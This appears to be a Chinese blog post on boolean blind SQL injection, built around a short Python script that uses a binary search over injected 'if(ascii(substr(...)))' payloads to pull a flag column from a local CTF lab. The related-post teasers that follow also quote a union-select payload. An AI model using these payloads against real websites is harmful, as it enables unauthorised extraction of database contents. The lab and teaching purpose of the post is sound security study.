攻防_漏洞_SQL注入_bool盲注

原创 已于 2024-02-04 14:39:39 修改 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #sql

于 2021-12-01 14:17:21 首次发布
该博客探讨了一种常见的网络安全问题——SQL注入。通过Python的requests库,作者展示了如何利用ASCII码进行字符遍历,尝试获取数据库中的敏感信息。博客中详细解释了利用`group_concat`和`substr`函数从`f1ag_table`中提取`i_am_f1ag_column`列的值的过程,并通过回显信息判断字符。此内容对于理解SQL注入攻击的原理和防御措施具有重要价值。 
import requests
import string

url = 'http://127.0.0.1:18888/sql/p7/index.php?id=2' #url
flag = ''
print(len(string.printable))
for i in range(1,30):
    l,r = 32, 127
    while l < r:
        m = (l+r) // 2
        payload = '-if(ascii(substr((select group_concat(i_am_f1ag_column) from f1ag_table), %d, 1))>%d, 1, 0)' % (i, m)
        res = requests.get('%s%s' % (url, payload))
        if "id = 1" in res.text: # 判断回显信息
            # flag += chr(m)
            l = m+1
        else:
            r = m
    flag += chr(l)
    print(flag)
print(flag)
SQL注入渗透与攻防(九)之布尔
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-23 993
Web的页面的仅仅会返回True和False。那么布尔就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。我们这里拿sql-libs的第五关来做演示,这是第五关的源代码:源码的意思大概是从id这个参数那里接收值,当这个值为true是输出You are in。。。。。false时什么都不输出。那我们是不是就可以利用这点结合上一篇文章讲解过的一些函数来进行猜解数据库呢?
SQL注入学习资料总结
墨痕诉清风的博客
05-13 887
结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行规范后,以此作为关系式数据库管理系统的标准语言(ANSI X3. 135-1986),1987年得到国际标准组织的支持下成为国际标准。不过各种通行的。
SQL注入之路之二:布尔型(boolean)
weixin_62715196的博客
08-10 1789
简单描述什么是布尔型以及对与布尔型如何进行注入,通过使用SQLmap自动化工具和人工结合burp suite两种方式讲述如何进行简单注入,并通过对DVWA靶场进行实操来验证手工结合burp suite实现布尔型注入的合理性
布尔类型的SQL注入
m0_64368365的博客
02-20 3053
布尔适用于无回显的情况,只有通过true或false及页面是否正常来判断所输入内容是否正确。
SQLi-LABS
m0_74855736的博客
03-14 1068
单引号闭合确定数据库查询的字段数确定显示位查询当前数据库名,查询当前数据库下所有的表查询user表中的字段数查询字段的数据。
SQL 注入漏洞(六)布尔型
不秃头的程序Yang
06-11 1296
二、判断
CTFHUB-WEB-SQL注入-时间
weixin_49539962的博客
08-05 545
题目提示是使用时间,并且不会有回显。解题的原理,是通过提交查询语句之后页面的刷新速度判断查询是否正确,如果正确从数据库中查找并返回response耗时比错误的语句稍长一些。但实际操作中受网络波动影响较大,使用sqlmap工具会方便很多。
网络安全攻防——SQL注入
CSDN
05-14 848
文章目录0、常用查询1、or+limit全局查询2、联合查询基础3、bool与爆破使用brup爆破4、time5、利用updatexml()报错注入6. 插入/更改注入7. 删除注入8.二次注入9. 堆查询注入10、一些函数总结limit 详解:11、总结与归纳 0、常用查询 表名 # 用limit 来一个一个找 ?id=-3' union select 1,1,table_name from information_schema.tables where table_schema=database
sqli-labs SQL注入靶场通关手册(1-21)
2301_76594872的博客
07-02 1202
前面需要准备打开phpstudy我这里是老版:phpstudy若3306端口被占用,win+r,cmd,命令行提示符里输入netstat -ano | findstr xxxx //xxxx为查询的端口号,找到pid,在任务管理器界面,选择对应的pid,详细信息结束进程同时需要再网页上打开跳转到如下界面:配置成功。
Oracle学习总结(6)—— SQL注入技术
科技D人生
09-23 3195
不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一。 SQL注入基本介绍 结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行
SQL注入技巧-暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
SQL注入()
a12332251的博客
12-07 1066
SQL
CTF从入门到提升(五) 部分截取函数及bool相关例题分析
anquanniu的博客
08-27 615
bool有区别与之前的基于时间的bool的页面输入会影响输出。 ​​我们来看操作理解一下: 语句结构id=1 ,我们去做判断的时候是id=1 and 1=1,and 1=1的本质是返回一个true,true可以用1来代替,正常回显。我们很多时候就会去接and=0,0类似于1=2返回是false, false类似于0的作用。 最后会影响到查询结果的是后面的0和1。 比如说触发查询...
SQL注入-布尔型
qq_65240014的博客
07-26 854
关于sql注入的略微进阶一点的文章,介绍关于bool的方法
CTFHub SQL注入(三)
2301_80911344的博客
04-12 1089
就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为。通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。适用情况:页面没有显示位,没有报错信息,只有成功和不成功两种情况。
二、sql注入(CTF技巧)
黑日里不灭的light
03-14 1443
解释:在一些题目里面常常充满了各种各样的过滤,我们需要结合实际情况去进行注入,下面提供一些Payload以及适用场景。
Bugku Web CTF-sql注入2
No Title
01-14 821
这道题过滤了许多关键字,包括但不限于select、union、and、or等,还有许多符号比如释符--,,、#等(需要意的是这里的过滤是指针对uname字段的过滤)。 一开始没什么思路,于是参考网上其他人写的wp,发现主要集中于以下两种解法: 用扫描工具扫出存在的漏洞,即.DS_STORE泄漏问题,然后获取对应的文件目录,可以看到目录下有flag文件。 灵光一闪,直接猜出目录下有admin或...
SQL注入漏洞测试(布尔)
qq_53386879的博客
07-29 232
进入靶场,发现有个滚动的公告点击进去,发现url框有着经典的id=1可以试试这能不能注入
SQL注入bool注入
studyphp123的博客
04-18 1369
一、预备知识 二、实验目的 三、实验工具 浏览器 四、实验环境 客户机一台 五、实验步骤 第一步:访问 http://www.any.com/sqli/Less-8/?id=1 页面正常: 第二步:加入单引号,访问 http://www.any.com/sqli/Less-8/?id=1' 不会报错,但是页面不正常,可以判断是bool注入: 第三步:判断列数(通过二分法) 1)输入:...
rt_bool_t
最新发布
06-12
我们正在讨论RT-Thread中的rt_bool_t类型。根据用户的问题,用户想了解rt_bool_t的定义和用法。在RT-Thread中,rt_bool_t是一个布尔类型,通常用于表示真/假值。首先,我们来看rt_bool_t的定义。在RT-Thread中,它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

赤年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值